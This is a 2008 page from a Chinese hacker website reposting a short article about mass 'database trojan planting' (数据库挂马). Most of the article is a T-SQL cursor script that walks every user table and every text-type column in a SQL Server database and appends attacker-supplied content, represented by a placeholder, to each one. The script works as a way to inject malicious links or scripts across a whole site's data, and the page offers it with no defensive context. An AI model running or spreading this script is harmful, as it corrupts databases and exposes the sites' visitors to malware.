黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 电脑新手 >> 正文
·最近比较流行的数据库挂04-28·攻击木马–远程控制软件04-28
·仿SQLTOOLS 写的一个工具04-28·输入小助手.vbs04-28
·logtamper-v1.0 修改lin04-28·nasl插件生成器(带源码04-28
·OBlog 的SQL注入漏洞检测04-28·经典Windows XP系统故障04-28
·全民红客 CNN攻击技术解04-28·megalogs提供300MB免费p04-28
·Windows Vista虚拟化功能04-27·硬盘故障排除大全04-27
·Vista SP1开机黑屏闪烁解04-27·教你进入有密码 Windows04-27
·myhosting247.com提供5004-27·玩转Windows Vista关机功04-26
·Win XP系统任务栏优化等04-26·香港新浪提供免费主页空04-26
·Windows XP用户:教你超04-25·我要发搜免费为电影站提04-25
·巧招为Vista系统上网冲浪04-24·门户通提供2G免费全能空04-24
·Vista下网络共享麻烦不断04-23·菜鸟到高手 系统自身挖掘04-23
·奏响曲 奏响在Vista下网04-23·与众不同windows Vista下04-23
·全面出击 让Vista网络安04-23·随意换 Vista启动和登陆04-23
[推荐]最近比较流行的数据库挂马
        ★★★★★

最近比较流行的数据库挂马

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-4-28 11:03:02

以前说过的趋势挂马事件,MS这个挂马方法已经流行了很久,从去年就大规模开始了,在网上可以搜到很多痕迹。

SQL语句如下:

用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)

xtype=99 ntext

xtype=35 text

xtype=231 nvarchar

xtype=167 varchar

———————YD的分割——————————–

DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select
a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype=’u’ and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update [’+@T+’] set [’+@C+’]=
rtrim(convert(varchar,[’+@C+’]))+
挂马内容”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

———————YD的分割——————————–

文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886